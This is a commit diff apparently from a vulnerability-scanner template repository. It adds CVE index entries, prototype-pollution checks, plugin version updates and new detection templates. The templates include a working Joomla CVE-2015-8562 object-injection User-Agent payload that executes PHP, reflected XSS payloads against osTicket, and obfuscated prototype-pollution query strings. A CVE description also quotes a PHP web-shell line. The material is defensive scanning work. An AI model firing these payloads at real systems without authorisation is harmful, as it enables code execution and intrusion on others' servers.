{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
@ -2573,6 +2586,7 @@
{"ID":"CVE-2024-38856","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38856.yaml"}
{"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"}
{"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"}
{"ID":"CVE-2024-39713","Info":{"Name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39713.yaml"}
{"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"}
{"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"}
{"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"}
@ -2587,18 +2601,21 @@
{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"}
{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43360","Info":{"Name":"ZoneMinder - SQL Injection","Severity":"critical","Description":"ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43360.yaml"}
{"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"}
{"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}
{"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"}
{"ID":"CVE-2024-43917","Info":{"Name":"WordPress TI WooCommerce Wishlist Plugin \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43917.yaml"}
{"ID":"CVE-2024-44000","Info":{"Name":"LiteSpeed Cache \u003c= 6.4.1 - Sensitive Information Exposure","Severity":"high","Description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-44000.yaml"}
{"ID":"CVE-2024-4434","Info":{"Name":"LearnPress WordPress LMS Plugin \u003c= 4.2.6.5 - SQL Injection","Severity":"critical","Description":"The LearnPress WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the term_id parameter in versions up to, and including, 4.2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"}
{"ID":"CVE-2024-44349","Info":{"Name":"AnteeoWMS \u003c v4.7.34 - SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44349.yaml"}
{"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the listingfields parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"}
{"ID":"CVE-2024-44849","Info":{"Name":"Qualitor \u003c= 8.24 - Remote Code Execution","Severity":"critical","Description":"Qualitor up to 8.24 is vulnerable to Remote Code Execution (RCE) via Arbitrary File Upload in checkAcesso.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-44849.yaml"}
{"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"}
{"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"}
{"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"}
{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"}
{"ID":"CVE-2024-45488","Info":{"Name":"SafeGuard for Privileged Passwords \u003c 7.5.2 - Authentication Bypass","Severity":"critical","Description":"One Identity Safeguard for Privileged Passwords before 7.5.2 allows unauthorized access because of an issue related to cookies. This only affects virtual appliance installations (VMware or HyperV). The fixed versions are 7.0.5.1 LTS, 7.4.2, and 7.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45488.yaml"}
{"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"}
{"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"}
{"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"}
@ -2621,6 +2638,7 @@
{"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"}
{"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"}
{"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"}
{"ID":"CVE-2024-5910","Info":{"Name":"Palo Alto Expedition - Admin Account Takeover","Severity":"critical","Description":"Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-5910.yaml"}
{"ID":"CVE-2024-5932","Info":{"Name":"GiveWP - PHP Object Injection","Severity":"critical","Description":"The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5932.yaml"}
{"ID":"CVE-2024-5936","Info":{"Name":"PrivateGPT \u003c 0.5.0 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in imartinez/privategpt version 0.5.0 due to improper handling of the 'file' parameter. This vulnerability allows attackers to redirect users to a URL specified by user-controlled input without proper validation or sanitization.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-5936.yaml"}
{"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
223d0a251042512ea9601274d93c16f4
e2c650aa2b533a247598fb920bd38734

3
dast/vulnerabilities/sqli/sqli-error-based.yaml
View File

@ -494,5 +494,4 @@ http:
- "SQ200: No table "
- "Virtuoso S0002 Error"
- "\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]"
# digest: 4b0a00483046022100966a70c7d7be953b8599b861fc338b7cd07ccdf1cbb93d789e504acd7e17088f022100c5479e75293b0b3f63f68b1f52124a544e68ac11490c58b0b8978a07cd882339:922c64590222798bb761d5b6d8e72950
# digest: 490a004630440220312a2619a0bef4a0328b000b96cf09ecf42226ee9b872709c7a0be7b7816f656022007e96f4d42fb5ee12201d386a057c06a4c1f3f38e4264a6c2459ba1766d3d0e4:922c64590222798bb761d5b6d8e72950

4
dast/vulnerabilities/sqli/time-based-sqli.yaml
View File

@ -19,6 +19,7 @@ http:
- type: dsl
dsl:
- "duration<=7"
internal: true
- raw:
- |
@ -47,4 +48,5 @@ http:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950
# digest: 4b0a00483046022100e8266a692ff2cc477215800d03fea01da4bb13c82251996b57ef4a6fc6ba63d702210095cfc9e092e7375b414bc41745d4954bf5ef0de6117040a43f83e63ebd7b7d13:922c64590222798bb761d5b6d8e72950

90
headless/prototype-pollution-check.yaml
View File

@ -5,7 +5,8 @@ info:
author: pdteam
severity: medium
metadata:
max-request: 4
max-request: 8
verified: true
tags: headless
headless:
@ -17,7 +18,7 @@ headless:
- action: waitload
- action: script
name: extract
name: extract1
args:
code: |
() => {
@ -25,7 +26,7 @@ headless:
}
matchers:
- type: word
part: extract
part: extract1
words:
- "polluted"
@ -88,4 +89,85 @@ headless:
part: extract4
words:
- "polluted"
# digest: 490a0046304402203ff07b0c962c43a69dfc76af68fa56d67e2a9fd360759cc049f60b0881de88c402207dbfca6a94102f5a72926b28b0d10c3e80ad752625090dfb46f31c1774758f99:922c64590222798bb761d5b6d8e72950
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract5
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract5
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract6
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract6
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
action: navigate
- action: waitload
- action: script
name: extract7
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract7
words:
- "polluted"
- steps:
- args:
url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
action: navigate
- action: waitload
- action: script
name: extract8
args:
code: |
() => {
return window.vulnerableprop
}
matchers:
- type: word
part: extract8
words:
- "polluted"
# digest: 490a004630440220332d2eb43e6ee2b3b48ca3bd7b953693814ce81ca3c34fa2036bcbfc93482d6a02204efa7ecda7b863d46e7a42d80500a115097ba317b63547ed5c07a4124338dafc:922c64590222798bb761d5b6d8e72950

2
helpers/wordpress/plugins/advanced-custom-fields.txt
View File

@ -1 +1 @@
6.3.6.2
6.3.6.3

2
helpers/wordpress/plugins/all-in-one-wp-migration.txt
View File

@ -1 +1 @@
7.86
7.87

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
4.4.4
4.4.6

2
helpers/wordpress/plugins/backwpup.txt
View File

@ -1 +1 @@
4.1.5
4.1.6

2
helpers/wordpress/plugins/cookie-law-info.txt
View File

@ -1 +1 @@
3.2.6
3.2.7

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.24.6
3.24.7

2
helpers/wordpress/plugins/elementskit-lite.txt
View File

@ -1 +1 @@
3.2.8
3.2.9

2
helpers/wordpress/plugins/forminator.txt
View File

@ -1 +1 @@
1.35.1
1.36.0

2
helpers/wordpress/plugins/header-footer-elementor.txt
View File

@ -1 +1 @@
1.6.42
1.6.43

2
helpers/wordpress/plugins/hostinger.txt
View File

@ -1 +1 @@
3.0.12
3.0.14

2
helpers/wordpress/plugins/jetpack-boost.txt
View File

@ -1 +1 @@
3.5.1
3.5.2

2
helpers/wordpress/plugins/jetpack.txt
View File

@ -1 +1 @@
13.9
13.9.1

2
helpers/wordpress/plugins/kadence-blocks.txt
View File

@ -1 +1 @@
3.3.1
3.3.2

2
helpers/wordpress/plugins/litespeed-cache.txt
View File

@ -1 +1 @@
6.5.1
6.5.2

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
5.3.0
5.3.1

2
helpers/wordpress/plugins/maintenance.txt
View File

@ -1 +1 @@
4.13
4.14

2
helpers/wordpress/plugins/malcare-security.txt
View File

@ -1 +1 @@
5.77
5.81

2
helpers/wordpress/plugins/newsletter.txt
View File

@ -1 +1 @@
8.5.6
8.5.7

2
helpers/wordpress/plugins/nextend-facebook-connect.txt
View File

@ -1 +1 @@
3.1.14
3.1.15

2
helpers/wordpress/plugins/ocean-extra.txt
View File

@ -1 +1 @@
2.3.1
2.4.0

2
helpers/wordpress/plugins/optinmonster.txt
View File

@ -1 +1 @@
2.16.5
2.16.6

2
helpers/wordpress/plugins/premium-addons-for-elementor.txt
View File

@ -1 +1 @@
4.10.56
4.10.59

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.229
1.0.230

2
helpers/wordpress/plugins/smart-slider-3.txt
View File

@ -1 +1 @@
3.5.1.23
3.5.1.24

2
helpers/wordpress/plugins/tablepress.txt
View File

@ -1 +1 @@
2.4.3
2.4.4

2
helpers/wordpress/plugins/w3-total-cache.txt
View File

@ -1 +1 @@
2.7.6
2.7.7

2
helpers/wordpress/plugins/woocommerce-gateway-stripe.txt
View File

@ -1 +1 @@
8.7.0
8.8.0

2
helpers/wordpress/plugins/woocommerce-payments.txt
View File

@ -1 +1 @@
8.3.0
8.3.1

2
helpers/wordpress/plugins/woocommerce-paypal-payments.txt
View File

@ -1 +1 @@
2.9.2
2.9.3

2
helpers/wordpress/plugins/wp-google-maps.txt
View File

@ -1 +1 @@
9.0.40
9.0.43

2
helpers/wordpress/plugins/wp-maintenance-mode.txt
View File

@ -1 +1 @@
2.6.12
2.6.13

2
helpers/wordpress/plugins/wpforms-lite.txt
View File

@ -1 +1 @@
1.9.1.3
1.9.1.4

4
http/cves/2013/CVE-2013-7091.yaml
View File

@ -61,5 +61,5 @@ http:
- type: regex
regex:
- "root=.*:0:0"
# digest: 4a0a0047304502201b7a6938b4ba249a10fc7db131b554a3a5d026eea84f0c017f906046552a884c022100d7fc5da079a0e863422c5d15ac03bc2118e7a68415cc1181fa9d1b87ca1da794:922c64590222798bb761d5b6d8e72950
- "root:.*:0:0:"
# digest: 4b0a00483046022100b97dc7216d247bc3f2a24b3c5f7cc69ec237ac053ae91149c8c54229febc73ba022100a2c9b0d7bfdd0c58db33d911d5b00093258fd66f97aee175992679341128cb1b:922c64590222798bb761d5b6d8e72950

62
http/cves/2015/CVE-2015-8562.yaml Normal file
View File

@ -0,0 +1,62 @@
id: CVE-2015-8562
info:
name: Joomla HTTP Header Unauthenticated - Remote Code Execution
author: kairos-hk,bolkv,n0ming,RoughBoy0723
description: |
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
severity: high
reference:
- https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562
- https://nvd.nist.gov/vuln/detail/CVE-2015-8562
classification:
cvss-metrics: AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2015-8562
metadata:
max-request: 2
vendor: joomla
product: joomla\!
shodan-query:
- http.html:"joomla! - open source content management"
- http.component:"joomla"
- cpe:"cpe:2.3:a:joomla:joomla\!"
fofa-query: body="joomla! - open source content management"
tags: cve,cve2015,joomla,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"Joomla")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e9d585daa1c154a8a02cc56a9950cd6acf63af5aadea9ee9343e00847d05bf77022100a3f090d371c718e2cdb376477d31caa13c53141325dddb998a2722d21cb4248b:922c64590222798bb761d5b6d8e72950

75
http/cves/2018/CVE-2018-7192.yaml Normal file
View File

@ -0,0 +1,75 @@
id: CVE-2018-7192
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /ajax.php/form/help-topic in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "message" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7192
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7192
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /ajax.php/form/help-topic/1?a934f512c6644b03=&message=dgh7r%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20qavj5 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "dgh7r onmouseover=alert(document.domain) style=position:")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450221009ec71e04f5587f9555c3a6455856fe0707c97016bf732bb2d32d3820c3c849990220474b01d82393e9e7e06e06b45821eebf52976c16c985bafab24e31a373fe90e5:922c64590222798bb761d5b6d8e72950

75
http/cves/2018/CVE-2018-7193.yaml Normal file
View File

@ -0,0 +1,75 @@
id: CVE-2018-7193
info:
name: osTicket < 1.10.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in /scp/directory.php in Enhancesoft osTicket before 1.10.2 allows remote attackers to inject arbitrary web script or HTML via the "order" parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
remediation: |
Upgrade osTicket to later version to mitigate this vulnerability.
reference:
- https://blog.securityevaluators.com/vulnerabilities-found-in-popular-ticketing-system-dd273bda229c
- https://nvd.nist.gov/vuln/detail/CVE-2018-7193
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-7193
cwe-id: CWE-79
epss-score: 0.00172
epss-percentile: 0.54693
cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: osticket
product: osticket
shodan-query: title:"osTicket"
fofa-query: title="osticket"
google-query: intitle:"osticket"
tags: cve,cve2018,osticket,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET /scp/login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "osticket")'
internal: true
extractors:
- type: regex
name: csrftoken
part: body
group: 1
regex:
- '__CSRFToken__" value="(.*?)"'
internal: true
- raw:
- |
POST /scp/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__CSRFToken__={{csrftoken}}&do=scplogin&userid={{username}}&passwd={{password}}&ajax=1
- |
GET /scp/directory.php?&&order="><script>alert(document.domain);</script>&sort=dept HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "\"><script>alert(document.domain);</script>")'
- 'contains(header, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100cbec67f214c6e316f3cd571c048efe4b5fa30471027dd468a2389f12c0f5d6300220723b75f7d4347a6bd1b0a8d70329eee12753226569f662899a1c2fb853b4a7a4:922c64590222798bb761d5b6d8e72950

73
http/cves/2018/CVE-2018-7196.yaml Normal file
View File

